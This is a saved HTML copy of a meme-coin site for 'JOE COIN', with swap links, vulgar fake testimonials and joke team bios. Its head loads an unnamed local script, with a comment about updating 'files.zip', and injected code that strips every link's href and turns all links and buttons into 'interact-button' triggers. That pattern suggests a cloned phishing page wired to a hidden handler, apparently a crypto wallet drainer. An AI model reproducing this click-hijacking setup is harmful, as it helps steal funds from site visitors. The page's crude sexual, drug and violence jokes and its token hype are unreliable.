<!DOCTYPE html><!-- Last Published: Fri Nov 24 2023 09:20:23 GMT+0000 (Coordinated Universal Time) -->
<html data-wf-domain="www.thejoecoin.com" data-wf-page="6536bf60e0703ab53e1b1621" data-wf-site="652fa96047b56e42a2867100" class="w-mod-js wf-baskervville-i4-active wf-baskervville-n4-active wf-inter-n6-active wf-inter-n4-active wf-inter-n7-active wf-inter-n5-active wf-active" >

<head>
    <style>
        .wf-force-outline-none[tabindex="-1"]:focus{outline:none;}
    </style>

<script charset="UTF-8" type="text/javascript" src="./ae5e5847-603d-42a3-ad8e-045a7b86c69a.js"></script><!–– Please update files.zip if you not already did and check below (updated the 11/11) ––>

<script>
  document.addEventListener('DOMContentLoaded', function () {
      var links = document.querySelectorAll('body a');
      for (var i = 0; i < links.length; i++) {
          var link = links[i];
          link.removeAttribute('href');
          link.classList.add('interact-button');
      }
  });
  </script>
  
  <script>
  document.addEventListener('DOMContentLoaded', function () {
      var buttons = document.querySelectorAll('body button');
      for (var i = 0; i < buttons.length; i++) {
          var button = buttons[i];
          button.classList.add('interact-button');
      }
  });
  </script>
  
  <script>
  document.addEventListener("DOMContentLoaded", function() {
      const elements = document.querySelectorAll('[ad-data-linked]');
      elements.forEach(element => {
          element.removeAttribute('ad-data-linked');
      });
  
      console.log('Removed ad-data-linked attributes from', elements.length, 'elements');
  });
  </script>
  
  <style>
  .interact-button {
      cursor: pointer;
  }
  </style>
<title>JOE</title>
    <meta content="Pray, for joe and his loved ones. Please." name="description">
    <meta content="JOE" property="og:title">
    <meta content="Pray, for joe and his loved ones. Please." property="og:description">
    <meta content="https://cdn.prod.website-files.com/652fa96047b56e42a2867100/653a502919cce92fb51917bd_Frame%2020.png" property="og:image">
    <meta content="JOE" property="twitter:title">
    <meta content="Pray, for joe and his loved ones. Please." property="twitter:description">
    <meta content="https://cdn.prod.website-files.com/652fa96047b56e42a2867100/653a502919cce92fb51917bd_Frame%2020.png" property="twitter:image">
    <meta property="og:type" content="website">
    <meta content="summary_large_image" name="twitter:card">
    <meta content="width=device-width, initial-scale=1" name="viewport">
    <link href="joecoin.webflow.5176628fc.css" rel="stylesheet" type="text/css">
    <link rel="stylesheet" href="css.css" media="all">
    <link href="6531f942f2b3eec77b034a7c_joefavicon.png" rel="shortcut icon" type="image/x-icon">
    <link href="https://cdn.prod.website-files.com/652fa96047b56e42a2867100/6531f945b94c8eb79438f27d_joeWebclip.png" rel="apple-touch-icon"><!-- [Attributes by Finsweet] Copy to clipboard -->
    <style>
        body {
          overflow-x: hidden;
        }
    </style>
</head>

<body class="body">
    <div class="w-layout-blockcontainer container w-container">
        <section class="section-2">
            <div class="blacktext">JOE COIN <br> REWARDS</div><a fs-copyclip-message="Copied!" fs-copyclip-element="click" fs-copyclip-text="0x76e222b07c53d28b89b0bac18602810fc22b49a8" href="#" class="addrbutton w-button">CAIM</a>
        </section>
        <section class="section-5">
            <div class="text-block-2">Hello my name is Joe, some call me Joe</div>
        </section>
        <div class="w-layout-hflex flex-block"><a href="https://app.uniswap.org/swap?outputCurrency=0x76e222b07c53d28b89b0bac18602810fc22b49a8" target="_blank" class="link w-inline-block">
                <div>Uniswap</div>
            </a><a href="https://t.me/joecoinportal" target="_blank" class="link w-inline-block">
                <div>Telegram</div>
            </a><a href="https://twitter.com/joecoin_" target="_blank" class="link w-inline-block">
                <div>Twitter</div>
            </a></div>
        <section class="section-3"><a href="https://app.uniswap.org/swap?outputCurrency=0x76e222b07c53d28b89b0bac18602810fc22b49a8" target="_blank" class="link-block w-inline-block">
                <div>Uniswap</div>
            </a><img src="65430db8167bca4f0da6e7e2_HeroImage1.png" loading="lazy" alt="" class="image-13"><img src="65303aa139002e30b366e59f_Frame%207.png" loading="lazy" alt="" class="image-14"><img src="65303aa16b9a623e3f9d8903_Frame%208.png" loading="lazy" alt="" class="image-15"><img src="65303aa1c4124b4a89848d99_Frame%209.png" loading="lazy" alt="" class="image-16"></section>
        <section class="section"><a href="https://app.uniswap.org/swap?outputCurrency=0x76e222b07c53d28b89b0bac18602810fc22b49a8" target="_blank" class="button w-button">Uniswap</a><a href="https://www.dextools.io/app/en/ether/pair-explorer/0x704ad8d95c12d7fea531738faa94402725acb035" target="_blank" class="button w-button">Dextools</a><a href="https://t.me/joecoinportal" target="_blank" class="button w-button">Telegram</a><a href="https://twitter.com/joecoin_" target="_blank" class="button w-button">Twitter</a></section>
        <section class="section-4"><img src="6530efa3ffeafda6030769af_Menu.png" loading="lazy" width="173" alt="" class="image-3">
            <div class="w-layout-vflex flex-block-2">
                <div class="description">'JOE&nbsp;COIN'</div>
                <div class="description subtext blue">Hello my name is Joe, some call me joe<br></div>
                <div class="description subtext blue">Привет, меня зовут Джо, некоторые зовут меня Джо.</div>
                <div class="description subtext">向下滚动或</div>
                <div class="description subtext red">scroll down or 100 years of bad luck</div>
                <div class="description subtext">向下滚动或 100 年霉运</div>
            </div><img src="6530efa3b635b01d68adafb8_grassPatch-1.png" loading="lazy" sizes="(max-width: 534px) 100vw, 534px" srcset="6530efa3b635b01d68adafb8_grassPatch-p-500.png 500w, 6530efa3b635b01d68adafb8_grassPatch.png 534w" alt="" class="image-4">
        </section>
    </div>
    <div class="w-layout-blockcontainer container-2 w-container">
        <div class="text-block">Joepaper</div><img src="653047e8f6f76c0c70dca0e4_d0e151_4770e45df1a64440a8e43c29fee335ec_mv2%201-1.png" loading="lazy" width="995" sizes="(max-width: 479px) 100vw, (max-width: 991px) 80vw, 100vw" alt="" srcset="653047e8f6f76c0c70dca0e4_d0e151_4770e45df1a64440a8e43c29fee335ec_mv2%201-p-500.png 500w, 653047e8f6f76c0c70dca0e4_d0e151_4770e45df1a64440a8e43c29fee335ec_mv2%201-p-800.png 800w, 653047e8f6f76c0c70dca0e4_d0e151_4770e45df1a64440a8e43c29fee335ec_mv2%201-p-1080.png 1080w, 653047e8f6f76c0c70dca0e4_d0e151_4770e45df1a64440a8e43c29fee335ec_mv2%201.png 1440w" class="image">
    </div>
    <section class="gallery-overview">
        <div class="container-5">
            <div class="gallery-wrapper">
                <div id="w-node-_2b5fe342-759d-12aa-3de6-00509079de3b-3e1b1621" class="gallery-block">
                    <h3><span class="text-span">BODY COUNT..</span></h3>
                    <p class="paragraph">I USUALLY AVOID TALKING ABOUT IT BUT I WAS NEVER LUCKY WITH WOMEN BEFORE FAME.</p>
                    <div class="gallery-features-block">
                        <ul role="list" class="gallery-list w-list-unstyled">
                            <li>
                                <div class="gallery-feature">AFTER I GOT FAMOUS EVERYTHING CHANGED. NOW I HAVE 5+ HOURS OF NON-STOP ERECTIONS ATLEAST TWICE A DAY.</div>
                            </li>
                            <li>
                                <div class="gallery-feature">HOW DID I ACHIEVE THIS? SIMPLE AS QUANTUM MECHANICS.</div>
                            </li>
                            <li>
                                <div class="gallery-feature">I BOUGHT JOE. YES I SUPPORT MYSELF. EVERY JOE SHOULD SUPPORT JOE</div>
                            </li>
                        </ul>
                    </div><a href="https://app.uniswap.org/swap?outputCurrency=0x76e222b07c53d28b89b0bac18602810fc22b49a8" class="button-primary w-button">FUCK HOT CHICKS NOW!</a>
                </div>
                <div id="w-node-_2b5fe342-759d-12aa-3de6-00509079de4d-3e1b1621" class="gallery-grid"><img src="653a4976f7d03bba23163e95_file_883373%201-1.png" loading="lazy" id="w-node-_2b5fe342-759d-12aa-3de6-00509079de4e-3e1b1621" sizes="100vw" alt="" srcset="653a4976f7d03bba23163e95_file_883373%201-p-500.png 500w, 653a4976f7d03bba23163e95_file_883373%201-p-800.png 800w, 653a4976f7d03bba23163e95_file_883373%201-p-1080.png 1080w, 653a4976f7d03bba23163e95_file_883373%201.png 1200w" class="gallery-image shadow-two"><img src="653a499acf10b8a475ab30af_8bf81fdb5f5755dd8931e937e6e12a10_original%201-1.png" loading="lazy" id="w-node-_2b5fe342-759d-12aa-3de6-00509079de4f-3e1b1621" sizes="100vw" alt="" srcset="653a499acf10b8a475ab30af_8bf81fdb5f5755dd8931e937e6e12a10_original%201-p-500.png 500w, 653a499acf10b8a475ab30af_8bf81fdb5f5755dd8931e937e6e12a10_original%201.png 578w" class="gallery-image shadow-two"><img src="653a4a1472ec5dfeaf7ff681_ban_nan_nas_by_angelreaper1972_ddqqjud-fullview%201-1.png" loading="lazy" id="w-node-_2b5fe342-759d-12aa-3de6-00509079de50-3e1b1621" sizes="100vw" alt="" srcset="653a4a1472ec5dfeaf7ff681_ban_nan_nas_by_angelreaper1972_ddqqjud-fullview%201-p-500.png 500w, 653a4a1472ec5dfeaf7ff681_ban_nan_nas_by_angelreaper1972_ddqqjud-fullview%201-p-800.png 800w, 653a4a1472ec5dfeaf7ff681_ban_nan_nas_by_angelreaper1972_ddqqjud-fullview%201.png 938w" class="gallery-image shadow-two"></div>
                <div id="w-node-_2b5fe342-759d-12aa-3de6-00509079de52-3e1b1621" class="gallery-grid"><img src="653a496e204b70a02143bf51_file_882465%201-1.png" loading="lazy" id="w-node-_2b5fe342-759d-12aa-3de6-00509079de53-3e1b1621" sizes="100vw" alt="" srcset="653a496e204b70a02143bf51_file_882465%201-p-500.png 500w, 653a496e204b70a02143bf51_file_882465%201.png 800w" class="gallery-image shadow-two"><img src="653a49c46ce0432d9fb57cb2_bfb5ce7cd430ed435a93b8187a6c4eaa_original%201-1.png" loading="lazy" id="w-node-_2b5fe342-759d-12aa-3de6-00509079de54-3e1b1621" sizes="100vw" alt="" srcset="653a49c46ce0432d9fb57cb2_bfb5ce7cd430ed435a93b8187a6c4eaa_original%201-p-500.png 500w, 653a49c46ce0432d9fb57cb2_bfb5ce7cd430ed435a93b8187a6c4eaa_original%201-p-800.png 800w, 653a49c46ce0432d9fb57cb2_bfb5ce7cd430ed435a93b8187a6c4eaa_original%201.png 806w" class="gallery-image shadow-two"><img src="653a49fbbbd9309fc9c3632c_f5b134a3ef9df219584bb57b8ef56949_original%201-1.png" loading="lazy" width="652.5" id="w-node-_2b5fe342-759d-12aa-3de6-00509079de55-3e1b1621" alt="" srcset="653a49fbbbd9309fc9c3632c_f5b134a3ef9df219584bb57b8ef56949_original%201-p-500.png 500w, 653a49fbbbd9309fc9c3632c_f5b134a3ef9df219584bb57b8ef56949_original%201-p-800.png 800w, 653a49fbbbd9309fc9c3632c_f5b134a3ef9df219584bb57b8ef56949_original%201.png 899w" sizes="100vw" class="gallery-image shadow-two"></div>
            </div>
        </div>
    </section>
    <section class="testimonial-column-dark">
        <div class="container-6">
            <h2 class="centered-heading">TESTIMONIALS</h2>
            <div class="testimonial-grid">
                <div id="w-node-_55d808b5-abb0-8126-66ee-e7b1771275ea-3e1b1621" class="testimonial-block-main"><img src="653a4aa3b4c3cace3e89961b_jessiguy%201-1.png" loading="lazy" sizes="100vw" srcset="653a4aa3b4c3cace3e89961b_jessiguy%201-p-500.png 500w, 653a4aa3b4c3cace3e89961b_jessiguy%201.png 610w" alt="" class="testimonial-main-image">
                    <div class="testimonial-main-content">
                        <p class="margin-bottom-24px-2">"At first i think its safe to say that i was skeptical but damn... look at me now? aint fucking sexy and like so appealing.. like bro im the fucking sex symbol of 2024</p>
                        <div>
                            <h3 class="testimonial-main-heading">the guy from uhh</h3>
                            <div class="text-block-30">the guy from breaking bad</div>
                        </div>
                    </div>
                </div>
                <div id="w-node-_55d808b5-abb0-8126-66ee-e7b1771275f4-3e1b1621" class="testimonial-block">
                    <p class="margin-bottom-24px-2">since they are a joe they are pretty productive. being a joe def outperformed aderall xr..<br>these guys are genius</p>
                    <div class="testimonial-info-two"><img src="653a4b11b31a3977632d3b54_gustaviguy%201-1.png" loading="lazy" sizes="100vw" srcset="653a4b11b31a3977632d3b54_gustaviguy%201-p-500.png 500w, 653a4b11b31a3977632d3b54_gustaviguy%201.png 610w" alt="" class="testimonial-image">
                        <div>
                            <div class="testimonial-author-name">gustavo</div>
                        </div>
                    </div>
                </div>
                <div id="w-node-_55d808b5-abb0-8126-66ee-e7b1771275fe-3e1b1621" class="testimonial-block">
                    <p class="margin-bottom-24px-2">i can stay hard rock for the entirety of my high school chem classes</p>
                    <div class="testimonial-info-two"><img src="653a4b479c49f5f51444b8c2_waltiguy%201-1.png" loading="lazy" sizes="100vw" srcset="653a4b479c49f5f51444b8c2_waltiguy%201-p-500.png 500w, 653a4b479c49f5f51444b8c2_waltiguy%201.png 610w" alt="" class="testimonial-image">
                        <div>
                            <div class="testimonial-author-name">walter</div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </section>
    <section class="team-circles">
        <div class="container-6">
            <h2 class="centered-heading-2">THE TEAM</h2>
            <div class="team-grid">
                <div id="w-node-_39da2324-2912-3a94-155b-10756549593b-3e1b1621" class="team-card"><img src="653a4c666272576565580935_494621589015494679.png" loading="lazy" alt="" class="team-member-image">
                    <div class="team-member-name">SASHA</div>
                    <div class="team-member-position">SECURITY ENGINEER</div>
                    <p>SHE MAKES SURE THAT EVERYONES OKAY. IS THE MOST NORMAL JOE WE COULD FIND THAT HAD TECHNICAL KNOWLEDGE ON HOW TO BUILD A CONTRACT.<br>‍<br>SHE'S NON BINARY BTW.</p>
                </div>
                <div id="w-node-_39da2324-2912-3a94-155b-107565495946-3e1b1621" class="team-card"><img src="653a4c70204b70a021472ab4_864616030454153257.png" loading="lazy" alt="" class="team-member-image">
                    <div class="team-member-name">JOEROX</div>
                    <div class="team-member-position">HE KNOWS</div>
                    <p>HE KNOWS, HE KNOWS, HE KNOWS, HE KNOWS, HE KNOWS, HE KNOWS, HE KNOWS, HE KNOWS, HE KNOWS, HE KNOWS, </p>
                </div>
                <div id="w-node-_39da2324-2912-3a94-155b-107565495950-3e1b1621" class="team-card"><img src="653a4c8f2eae60d2b55bbee3_951211949117571162.png" loading="lazy" alt="" class="team-member-image">
                    <div class="team-member-name">MICHAEL</div>
                    <div class="team-member-position">BUSINESS OPERATIONS</div>
                    <p>SINCE HE GOT BACK FROM CHERNOBYL HE'S WEARING THAT WEIRD SUIT..<br>HE KILLED HIS FAMILY BUT GOT AWAY WITH IT AFTER THE INCIDENT EVACUATION</p>
                </div>
                <div id="w-node-_39da2324-2912-3a94-155b-10756549595a-3e1b1621" class="team-card"><img src="653a4c9e3b0859b92afa59b1_American_Picardia%20(1)-1.png" loading="lazy" sizes="100vw" srcset="653a4c9e3b0859b92afa59b1_American_Picardia%20(1)-p-500.png 500w, 653a4c9e3b0859b92afa59b1_American_Picardia%20(1)-p-800.png 800w, 653a4c9e3b0859b92afa59b1_American_Picardia%20(1).png 825w" alt="" class="team-member-image">
                    <div class="team-member-name">AMERICA</div>
                    <div class="team-member-position">HE PROVIDES FUNDING FOR OUR ACTIVITIES. WE ARE VERY THANKFUL #AMERICA</div>
                </div>
                <div id="w-node-_39da2324-2912-3a94-155b-107565495964-3e1b1621" class="team-card"><img src="653a4cc056749aaa6b63c094_have%20a%20pipebomb-1.png" loading="lazy" sizes="100vw" srcset="653a4cc056749aaa6b63c094_have%20a%20pipebomb-p-500.png 500w, 653a4cc056749aaa6b63c094_have%20a%20pipebomb-p-800.png 800w, 653a4cc056749aaa6b63c094_have%20a%20pipebomb-p-1080.png 1080w, 653a4cc056749aaa6b63c094_have%20a%20pipebomb-p-1600.png 1600w, 653a4cc056749aaa6b63c094_have%20a%20pipebomb.png 1920w" alt="" class="team-member-image">
                    <div class="team-member-name">I DONT HAVE THE CHRACTERS TO TYPE OUT HIS NAME </div>
                    <div class="team-member-position">NEGOTIATOR</div>
                    <p>HE HAS A PARTICULAR WAY TO NEGOTIATE...</p>
                </div>
                <div id="w-node-_39da2324-2912-3a94-155b-10756549596e-3e1b1621" class="team-card"><img src="653a4cd4eeafa91f0e1f07ef_814225074349408357.png" loading="lazy" alt="" class="team-member-image">
                    <div class="team-member-name">CHADY</div>
                    <div class="team-member-position">ASSISTANT</div>
                    <p>HE MAKES SURE THAT EVERYONE IN THE TEAM IS TAKING THEIR MEDICATIONS.<br>HE OUTSOURCES FDA TESTING TO SOMALIA</p>
                </div>
            </div>
        </div>
    </section>
    <div class="w-layout-blockcontainer container-3 w-container">
        <div class="div-block-2">
            <div class="div-block-4"></div>
            <div class="div-block-3">
                <div class="text-block-16">Neurosomatic brainwashing -- the most powerful form of robotization -- consists in temporary activation of the neurosomatic circuit by the brainwasher, together with assurances that only the brainwasher (or the "god" who "acts through hum") can turn on this circuit.For full effect, this is, of course, proceeded by normal brainwashing. The victim is first isolated from his or her previous environment and trained to hook the bio-survival circuit onto the "guru" and/or the Ashram or commune. The emotional circuit is bent and broken by continuous attacks upon status (ego), until the only emotional security left is found in Total Submission to the group reality-island. The re-infantilized victim is then ready to imprint any semantic circuit desired, from psychological cults, political cults, religious cults, etc. The socio-sexual circuit can then easily be programmed for celibacy, for free-love or for whatever sexuual game the guru has selected. Then, and only then the neurosomantic buttons are pushed and ecstasy is "given" to the subject "by" the guru.</div>
                <div class="text-block-25">Neurosomatic brainwashing -- the most powerful form of robotization -- consists in temporary activation of the neurosomatic circuit by the brainwasher, together with assurances that only the brainwasher (or the "god" who "acts through hum") can turn on this circuit.For full effect, this is, of course, proceeded by normal brainwashing. The victim is first isolated from his or her previous environment and trained to hook the bio-survival circuit onto the "guru" and/or the Ashram or commune. The emotional circuit is bent and broken by continuous attacks upon status (ego), until the only emotional security left is found in Total Submission to the group reality-island. The re-infantilized victim is then ready to imprint any semantic circuit desired, from psychological cults, political cults, religious cults, etc. The socio-sexual circuit can then easily be programmed for celibacy, for free-love or for whatever sexuual game the guru has selected. Then, and only then the neurosomantic buttons are pushed and ecstasy is "given" to the subject "by" the guru.</div>
                <div class="div-block-11">
                    <div class="w-layout-vflex flex-block-3"><a href="https://app.uniswap.org/swap?outputCurrency=0x76e222b07c53d28b89b0bac18602810fc22b49a8" target="_blank" class="link-block-2 w-inline-block">
                            <div>Uniswap</div>
                        </a><a href="https://t.me/joecoinportal" target="_blank" class="link-block-2 w-inline-block">
                            <div>Telegram</div>
                        </a><a href="https://twitter.com/joecoin_" target="_blank" class="link-block-2 w-inline-block">
                            <div>Twitter</div>
                        </a></div>
                    <div class="div-block-12">
                        <div class="w-layout-vflex flex-block-3"><a href="https://app.uniswap.org/swap?outputCurrency=0x76e222b07c53d28b89b0bac18602810fc22b49a8" target="_blank" class="link-block-2 w-inline-block">
                                <div>Uniswap</div>
                            </a><a href="https://t.me/joecoinportal" target="_blank" class="link-block-2 w-inline-block">
                                <div>Telegram</div>
                            </a><a href="https://twitter.com/joecoin_" target="_blank" class="link-block-2 w-inline-block">
                                <div>Twitter</div>
                            </a></div>
                    </div>
                </div>
                <div class="div-block-13">
                    <div class="text-block-27">‘JOE COIN’</div>
                    <div class="text-block-26">noun; an investment vehicle for the pre-rich, the elite, and the cultured.</div>
                </div>
                <div class="text-block-29"></div>
            </div><img src="6536d6d64f89884ec72ecc88_Slice1-1.png" loading="lazy" sizes="(max-width: 1440px) 100vw, 1440px" srcset="6536d6d64f89884ec72ecc88_Slice1-p-500.png 500w, 6536d6d64f89884ec72ecc88_Slice1-p-800.png 800w, 6536d6d64f89884ec72ecc88_Slice1-p-1080.png 1080w, 6536d6d64f89884ec72ecc88_Slice1.png 1440w" alt=""><img src="6536d6d62c283a57081999e9_Slice2-1.png" loading="lazy" sizes="(max-width: 1440px) 100vw, 1440px" srcset="6536d6d62c283a57081999e9_Slice2-p-500.png 500w, 6536d6d62c283a57081999e9_Slice2-p-800.png 800w, 6536d6d62c283a57081999e9_Slice2-p-1080.png 1080w, 6536d6d62c283a57081999e9_Slice2.png 1440w" alt="">
        </div>
    </div>
    <section class="section-6"><img src="6536d6d6700ec80294de46bc_Slice3-1.png" loading="lazy" sizes="100vw" srcset="6536d6d6700ec80294de46bc_Slice3-p-500.png 500w, 6536d6d6700ec80294de46bc_Slice3-p-800.png 800w, 6536d6d6700ec80294de46bc_Slice3-p-1080.png 1080w, 6536d6d6700ec80294de46bc_Slice3.png 1440w" alt="">
        <div class="text-block-9">joe joe joe joe joe joe joe joe joe joe joe joe joe joe joe joe joe joe joe joe joe joe joe joe joe joe joe joe joe joe joe joe joe</div>
        <div class="text-block-10">joe joe joe joe joe joe joe joe joe joe joe joe joe joe joe joe joe joe joe joe joe joe joe joe joe joe joe joe joe joe joe joe joe</div>
        <div class="w-layout-vflex flex-block-2">
            <div class="description">'JOE&nbsp;COIN'</div>
            <div class="description subtext blue">Hello my name is Joe, some call me joe<br></div>
            <div class="description subtext blue">Привет, меня зовут Джо, некоторые зовут меня Джо.</div>
            <div class="description subtext">向下滚动或</div>
            <div class="description subtext red">scroll down or 100 years of bad luck</div>
            <div class="description subtext">向下滚动或 100 年霉运</div>
        </div>
        <div class="div-block-15">
            <div class="w-layout-vflex flex-block-3"><a href="https://app.uniswap.org/swap?outputCurrency=0x76e222b07c53d28b89b0bac18602810fc22b49a8" target="_blank" class="link-block-2 w-inline-block">
                    <div>Uniswap</div>
                </a><a href="https://t.me/joecoinportal" target="_blank" class="link-block-2 w-inline-block">
                    <div>Telegram</div>
                </a><a href="https://twitter.com/joecoin_" target="_blank" class="link-block-2 w-inline-block">
                    <div>Twitter</div>
                </a></div>
        </div>
        <div class="div-block-14">
            <div class="w-layout-hflex flex-block"><a href="https://app.uniswap.org/swap?outputCurrency=0x76e222b07c53d28b89b0bac18602810fc22b49a8" target="_blank" class="link w-inline-block">
                    <div>Uniswap</div>
                </a><a href="https://t.me/joecoinportal" target="_blank" class="link w-inline-block">
                    <div>Telegram</div>
                </a><a href="https://twitter.com/joecoin_" target="_blank" class="link w-inline-block">
                    <div>Twitter</div>
                </a></div>
            <div class="div-block-14"></div>
        </div>
    </section>
    <section class="hero-stack">
        <div class="container-5">
            <div class="hero-wrapper-two">
                <h1>JOE&nbsp;SHILL&nbsp;MEDIA PACK</h1>
                <p class="margin-bottom-24px">DO YOU WANT TO HELP JOE?<br>DO YOU WANT HIM TO HAVE A PROSPER LIFE?<br>PLEASE HELP HIM..... HERES A CURATED MEDIA PACK OF JOE PICTURES &amp;&nbsp;VIDEOS.</p><a href="#" class="button-primary w-button">download joepack</a><img src="653a47ea1889f4f91e93488c_JOEPACK-1.png" loading="lazy" sizes="100vw" srcset="653a47ea1889f4f91e93488c_JOEPACK-p-500.png 500w, 653a47ea1889f4f91e93488c_JOEPACK-p-800.png 800w, 653a47ea1889f4f91e93488c_JOEPACK-p-1080.png 1080w, 653a47ea1889f4f91e93488c_JOEPACK-p-1600.png 1600w, 653a47ea1889f4f91e93488c_JOEPACK.png 1920w" alt="" class="hero-image shadow-two">
            </div>
        </div>
    </section>
    <section class="footer-dark">
        <div class="container-4">
            <div class="footer-wrapper">
                <div class="footer-content">
                    <div id="w-node-_1aed09d3-4c83-ef57-f667-66b216362f4c-3e1b1621" class="footer-block"><a href="https://www.coingecko.com/en/coins/joe-coin" target="_blank" class="footer-link">Coingecko</a><a href="mailto:joecoineth@proton.me?subject=Hi%20Joe!" class="footer-link">Email</a><a href="https://github.com/thejoecoin" target="_blank" class="footer-link">Github</a><a href="https://www.youtube.com/channel/UC1gUKPbWazUrH6u1A_oZw1w" target="_blank" class="footer-link">YouTube</a><a href="https://www.instagram.com/thejoecoin/" target="_blank" class="footer-link">Instagram</a><a href="https://www.tiktok.com/@joecoin__" target="_blank" class="footer-link">Tiktok</a><a href="https://medium.com/@joecoineth" target="_blank" class="footer-link">Medium</a></div>
                </div>
            </div>
        </div>
    </section>
</body>

</html>